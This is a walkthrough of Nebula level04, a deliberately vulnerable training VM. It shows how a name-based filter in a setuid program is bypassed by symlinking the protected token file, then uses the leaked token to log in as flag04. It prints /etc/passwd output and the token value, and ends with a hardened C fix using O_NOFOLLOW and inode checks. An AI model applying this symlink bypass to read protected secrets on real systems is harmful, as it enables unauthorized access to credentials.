Nebula level04 Walkthrough

Nebula is a deliberately vulnerable virtual machine that covers a variety of weaknesses and vulnerabilities found in Linux systems.

Description of level04
“This level requires you to read the token file, but the code restricts the files that can be read. Find a way to bypass it :) To do this level, log in as the level04 account with the password level04. Files for this level can be found in /home/flag04.”

Breakdown of the above program
Lines 13–16

Prints the usage information if no argument is specified apart from the program file itself.

level04@nebula:/home/flag04$ ./flag04
./flag04 [file to read]

Lines 18–21
Checks if the second argument is “token” and exits if so.

level04@nebula:/home/flag04$ ./flag04 token
You may not access 'token'

Lines 23–26
open is a system call that opens a file and returns a file descriptor for it.

/*
int open(const char *path, int oflags);
int open(const char *path, int oflags, mode_t mode);
const char *path -> The relative or absolute path to the file that is to be opened.
int oflags -> A bitwise 'or' separated list of values that determine the method in which the file is to be opened (whether it should be read only, read/write, whether it should be cleared when opened, etc).
mode_t mode -> A bitwise 'or' separated list of values that determine the permissions of the file if it is created.
return value -> Returns the file descriptor for the opened file. The descriptor returned is always the lowest-numbered one that is not currently open in the process. On error, -1 is returned and errno is set.
*/
level04@nebula:/home/flag04$ ./flag04 non_existent
flag04: Unable to open non_existent: No such file or directory

Line 28
read is a system call used to read data into a buffer.

/*
ssize_t read(int fildes, void *buf, size_t nbytes);
int fildes -> The file descriptor of where to read the input. You can either use a file descriptor obtained from the open system call, or you can use 0, 1, or 2, to refer to standard input, standard output, or standard error, respectively.
void *buf -> A character array where the read content will be stored.
size_t nbytes -> The number of bytes to read before truncating the data. If the data to be read is smaller than nbytes, all data is saved in the buffer.
return value -> Returns the number of bytes that were read. If value is negative, then the system call returned an error.
*/
level04@nebula:/home/flag04$ ./flag04 /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:104::/var/run/dbus:/bin/false
nebula:x:1000:1000:nebula,,,:/home/nebula:/bin/bash
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
level00:x:1001:1001::/home/level00:/bin/sh
flag00:x:999:999::/home/flag0

Line 34
write is a system call that writes data from a buffer to a file descriptor.

/*
ssize_t write(int fildes, const void *buf, size_t nbytes);
int fildes -> The file descriptor of where to write the output. You can either use a file descriptor obtained from the open system call, or you can use 0, 1, or 2, to refer to standard input, standard output, or standard error, respectively.
const void *buf -> A buffer holding the content to write. It does not need to be null terminated, because nbytes gives the length.
size_t nbytes -> The number of bytes to write. If smaller than the provided buffer, the output is truncated.
return value -> Returns the number of bytes that were written. If value is negative, then the system call returned an error.
*/

Inspecting the program

level04@nebula:/home/flag04$ ./flag04
./flag04 [file to read]
level04@nebula:/home/flag04$ ./flag04 test
flag04: Unable to open test: No such file or directory
level04@nebula:/home/flag04$ ./flag04 /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:104::/var/run/dbus:/bin/false
nebula:x:1000:1000:nebula,,,:/home/nebula:/bin/bash
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
level00:x:1001:1001::/home/level00:/bin/sh
flag00:x:999:999::/home/flag0
level04@nebula:/home/flag04$ ./flag04 token
You may not access 'token'

Game Plan

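  • Create a symlink to the token file under a different name. The program checks only the name given on the command line, and open follows the symlink to the real file.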
level04@nebula:~$ ln -s /home/flag04/token key
  • Execute flag04 with key as the parameter
level04@nebula:~$ /home/flag04/flag04 key
06508b5e-8909-4f38-b630-fdb148a848a2
  • Log in to the flag04 account, using the string obtained above as the password
➜  ~ ssh flag04@192.168.1.7
      _   __     __          __
     / | / /__  / /_  __  __/ /___ _
    /  |/ / _ \/ __ \/ / / / / __ `/
   / /|  /  __/ /_/ / /_/ / / /_/ /
  /_/ |_/\___/_.___/\__,_/_/\__,_/
exploit-exercises.com/nebula
For level descriptions, please see the above URL.
To log in, use the username of "levelXX" and password "levelXX", where
XX is the level number.
Currently there are 20 levels (00 - 19).
flag04@192.168.1.7's password:
Welcome to Ubuntu 11.10 (GNU/Linux 3.0.0-12-generic i686)
* Documentation:  https://help.ubuntu.com/
New release '12.04 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
flag04@nebula:~$ getflag
You have successfully executed getflag on a target account
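
The root cause and a fix, as an added example that is not the level's own source: a name-based check (modelled here as a substring match, which is an assumption) sits next to a hardened open that refuses symlinks with O_NOFOLLOW and compares the device and inode of the opened file against the protected one. The function names, the scratch directory and the files in it are constructed for the demonstration.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Name-based check as described above (substring match is an assumption). */
static int open_name_check(const char *path) {
    if (strstr(path, "token")) { errno = EACCES; return -1; }
    return open(path, O_RDONLY);            /* open() follows symlinks */
}

/* Hardened: decide on the object that was opened, not on its name. */
static int open_identity_check(const char *path, const char *protected_path) {
    struct stat prot, got;
    int fd = open(path, O_RDONLY | O_NOFOLLOW | O_CLOEXEC);
    if (fd < 0) return -1;                  /* ELOOP: last component is a symlink */
    if (fstat(fd, &got) != 0) { close(fd); return -1; }
    /* Same device and inode means the same file, whatever name reached it. */
    if (stat(protected_path, &prot) == 0 &&
        prot.st_dev == got.st_dev && prot.st_ino == got.st_ino) {
        close(fd); errno = EACCES; return -1;
    }
    return fd;
}

/* Constructed scenario in a scratch directory; returns one bit per outcome. */
static int demo(void) {
    int fd, r = 0;
    char dir[] = "/tmp/l04demoXXXXXX";
    if (!mkdtemp(dir) || chdir(dir) != 0) return -1;
    if ((fd = open("token", O_CREAT | O_WRONLY, 0600)) >= 0) close(fd);
    if ((fd = open("notes", O_CREAT | O_WRONLY, 0600)) >= 0) close(fd);
    if (symlink("token", "key") != 0) return -1;
    if ((fd = open_name_check("key")) >= 0) { r |= 1; close(fd); }          /* name check passes the link */
    if (open_identity_check("key", "token") < 0 && errno == ELOOP) r |= 2;   /* symlink refused */
    if (open_identity_check("token", "token") < 0 && errno == EACCES) r |= 4; /* inode match refused */
    if ((fd = open_identity_check("notes", "token")) >= 0) { r |= 8; close(fd); } /* other files still readable */
    unlink("key"); unlink("token"); unlink("notes");
    return (chdir("/") == 0 && rmdir(dir) == 0) ? r : -1;
}

int main(void) { printf("outcomes = %d\n", demo()); return 0; }
```

O_NOFOLLOW only covers the final path component, which is why the inode comparison is kept as the deciding check.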

Happy Hacking !!!